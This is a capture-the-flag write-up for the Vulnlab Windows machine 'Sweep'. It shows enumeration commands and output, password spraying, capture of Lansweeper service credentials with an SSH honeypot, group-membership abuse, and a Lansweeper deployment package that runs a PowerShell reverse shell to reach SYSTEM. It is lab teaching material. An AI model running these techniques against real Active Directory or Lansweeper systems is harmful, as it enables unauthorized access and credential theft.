VL - Sweep
Sweep is a medium rated Windows Vulnlab machine created by Yeeb . The machine consist of getting access through weak credentials, abusing Lansweeper functionalities and abusing more Lansweeper functionalities.
Enumeration
As usual we start with a quick NMAP scan:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
81/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-title: Lansweeper - Login
|_Requested resource was /login.aspx
82/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=Lansweeper Secure Website
| Subject Alternative Name: DNS:localhost, DNS:localhost, DNS:localhost
| Not valid before: 2021-11-21T09:22:27
|_Not valid after: 2121-12-21T09:22:27
| http-title: Lansweeper - Login
|_Requested resource was /login.aspx
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-02-29 20:02:00Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sweep.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
3259/tcp filtered epncdp2
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sweep.vl0., Site: Default-First-Site-Name)
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-02-29T20:03:05+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=inventory.sweep.vl
| Not valid before: 2024-02-07T19:09:42
|_Not valid after: 2024-08-08T19:09:42
| rdp-ntlm-info:
| Target_Name: SWEEP
| NetBIOS_Domain_Name: SWEEP
| NetBIOS_Computer_Name: INVENTORY
| DNS_Domain_Name: sweep.vl
| DNS_Computer_Name: inventory.sweep.vl
| DNS_Tree_Name: sweep.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-02-29T20:02:24+00:00
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016 (85%)
OS CPE: cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: INVENTORY; OS: Windows; CPE: cpe:/o:microsoft:windows
We can now use NetExec to enumerate smb shares and bruteforce the RIDs with the Guest user:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
nxc smb 10.10.109.70 -u 'Guest' -p '' --shares --rid-brute
SMB 10.10.109.70 445 INVENTORY [*] Windows Server 2022 Build 20348 x64 (name:INVENTORY) (domain:sweep.vl) (signing:True) (SMBv1:False)
SMB 10.10.109.70 445 INVENTORY [+] sweep.vl\Guest:
SMB 10.10.109.70 445 INVENTORY [*] Enumerated shares
SMB 10.10.109.70 445 INVENTORY Share Permissions Remark
SMB 10.10.109.70 445 INVENTORY ----- ----------- ------
SMB 10.10.109.70 445 INVENTORY ADMIN$ Remote Admin
SMB 10.10.109.70 445 INVENTORY C$ Default share
SMB 10.10.109.70 445 INVENTORY DefaultPackageShare$ READ Lansweeper PackageShare
SMB 10.10.109.70 445 INVENTORY IPC$ READ Remote IPC
SMB 10.10.109.70 445 INVENTORY Lansweeper$ Lansweeper Actions
SMB 10.10.109.70 445 INVENTORY NETLOGON Logon server share
SMB 10.10.109.70 445 INVENTORY SYSVOL Logon server share
SMB 10.10.109.70 445 INVENTORY 498: SWEEP\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.109.70 445 INVENTORY 500: SWEEP\Administrator (SidTypeUser)
SMB 10.10.109.70 445 INVENTORY 501: SWEEP\Guest (SidTypeUser)
SMB 10.10.109.70 445 INVENTORY 502: SWEEP\krbtgt (SidTypeUser)
SMB 10.10.109.70 445 INVENTORY 512: SWEEP\Domain Admins (SidTypeGroup)
SMB 10.10.109.70 445 INVENTORY 513: SWEEP\Domain Users (SidTypeGroup)
SMB 10.10.109.70 445 INVENTORY 514: SWEEP\Domain Guests (SidTypeGroup)
SMB 10.10.109.70 445 INVENTORY 515: SWEEP\Domain Computers (SidTypeGroup)
SMB 10.10.109.70 445 INVENTORY 516: SWEEP\Domain Controllers (SidTypeGroup)
SMB 10.10.109.70 445 INVENTORY 517: SWEEP\Cert Publishers (SidTypeAlias)
SMB 10.10.109.70 445 INVENTORY 518: SWEEP\Schema Admins (SidTypeGroup)
SMB 10.10.109.70 445 INVENTORY 519: SWEEP\Enterprise Admins (SidTypeGroup)
SMB 10.10.109.70 445 INVENTORY 520: SWEEP\Group Policy Creator Owners (SidTypeGroup)
SMB 10.10.109.70 445 INVENTORY 521: SWEEP\Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.109.70 445 INVENTORY 522: SWEEP\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.10.109.70 445 INVENTORY 525: SWEEP\Protected Users (SidTypeGroup)
SMB 10.10.109.70 445 INVENTORY 526: SWEEP\Key Admins (SidTypeGroup)
SMB 10.10.109.70 445 INVENTORY 527: SWEEP\Enterprise Key Admins (SidTypeGroup)
SMB 10.10.109.70 445 INVENTORY 553: SWEEP\RAS and IAS Servers (SidTypeAlias)
SMB 10.10.109.70 445 INVENTORY 571: SWEEP\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.10.109.70 445 INVENTORY 572: SWEEP\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.10.109.70 445 INVENTORY 1000: SWEEP\INVENTORY$ (SidTypeUser)
SMB 10.10.109.70 445 INVENTORY 1101: SWEEP\DnsAdmins (SidTypeAlias)
SMB 10.10.109.70 445 INVENTORY 1102: SWEEP\DnsUpdateProxy (SidTypeGroup)
SMB 10.10.109.70 445 INVENTORY 1103: SWEEP\Lansweeper Admins (SidTypeGroup)
SMB 10.10.109.70 445 INVENTORY 1113: SWEEP\jgre808 (SidTypeUser)
SMB 10.10.109.70 445 INVENTORY 1114: SWEEP\bcla614 (SidTypeUser)
SMB 10.10.109.70 445 INVENTORY 1115: SWEEP\hmar648 (SidTypeUser)
SMB 10.10.109.70 445 INVENTORY 1116: SWEEP\jgar931 (SidTypeUser)
SMB 10.10.109.70 445 INVENTORY 1117: SWEEP\fcla801 (SidTypeUser)
SMB 10.10.109.70 445 INVENTORY 1118: SWEEP\jwil197 (SidTypeUser)
SMB 10.10.109.70 445 INVENTORY 1119: SWEEP\grob171 (SidTypeUser)
SMB 10.10.109.70 445 INVENTORY 1120: SWEEP\fdav736 (SidTypeUser)
SMB 10.10.109.70 445 INVENTORY 1121: SWEEP\jsmi791 (SidTypeUser)
SMB 10.10.109.70 445 INVENTORY 1122: SWEEP\hjoh690 (SidTypeUser)
SMB 10.10.109.70 445 INVENTORY 1123: SWEEP\svc_inventory_win (SidTypeUser)
SMB 10.10.109.70 445 INVENTORY 1124: SWEEP\svc_inventory_lnx (SidTypeUser)
SMB 10.10.109.70 445 INVENTORY 1125: SWEEP\intern (SidTypeUser)
SMB 10.10.109.70 445 INVENTORY 3101: SWEEP\Lansweeper Discovery (SidTypeGroup)
With this output we can make a user list and test for weak credentials like using the username as password or patterns like [company][year] or [season][year].
1
2
nxc smb 10.10.109.70 -u users.txt -p passwords.txt --shares --continue-on-success
SMB 10.10.109.70 445 INVENTORY [+] sweep.vl\intern:[REDACTED]
With working credentials we can access Lansweeper and we can also run Bloodhound to get some more information about the environment:
1
bloodhound-python -d sweep.vl -c All -dc inventory.sweep.vl -ns 10.10.109.70 -u intern -p [REDACTED] --zip
One thing that stands out is the shortest path to DA which makes use of the svc_inventory_lnx user via:
- GenericAll on Lansweeper Admins So when we get access to this user we can add our self to this group.
Capturing Credentials
There are SSH credentials configured for the svc_inventory_lnx user and Windows credentials for the svc_inventory_win. We can try capturing one of these with a SSH honeypot like sshesame, there are many more but this one popped up first. The documentation is simple and straightforward, the only thing important to change is the sshesame.yaml file and make it listen to 0.0.0.0:22:
1
2
3
4
5
6
7
8
./sshesame --config sshesame.yaml
INFO 2024/03/16 21:07:45 No host keys configured, using keys at "/home/bushidosan/.local/share/sshesame"
INFO 2024/03/16 21:07:45 Listening on [::]:22
WARNING 2024/03/16 21:09:24 Failed to accept connection: Failed to establish SSH server connection: EOF
WARNING 2024/03/16 21:09:28 Failed to accept connection: Failed to establish SSH server connection: ssh: disconnect, reason 11: Session closed
2024/03/16 21:09:28 [10.10.109.70:57075] authentication for user "svc_inventory_lnx" without credentials rejected
2024/03/16 21:09:29 [10.10.109.70:57075] authentication for user "svc_inventory_lnx" with password [REDACTED] accepted
2024/03/16 21:09:29 [10.10.109.70:57075] connection with client version "SSH-2.0-RebexSSH_5.0.8372.0" established
Getting Access
With the credentials and the information gathered through bloodhound we can try adding our self to the Lansweeper Admins group:
1
net rpc group addmem "Lansweeper Admins" "svc_inventory_lnx" -U SWEEP/svc_inventory_lnx -S inventory.sweep.vl
This gives us both administrator rights over Lansweeper and a way to get into the server via WinRM:
1
evil-winrm -i <IP> -u 'svc_inventory_lnx' -p <Password>
Even more
One of the interesting features in Lansweeper is the deployment package, this allows an LanSweeper administrator to execute commands on remote systems. I added a simple Powershell reverse shell to it from revshells.com, it doesn’t really matter as long as it is below 1000 characters. As stated earlier there is also a windows service account configured with credentials, we can create a new mapping and map it to our target and run the package to obtain SYSTEM.
This post is licensed under CC BY 4.0 by the author.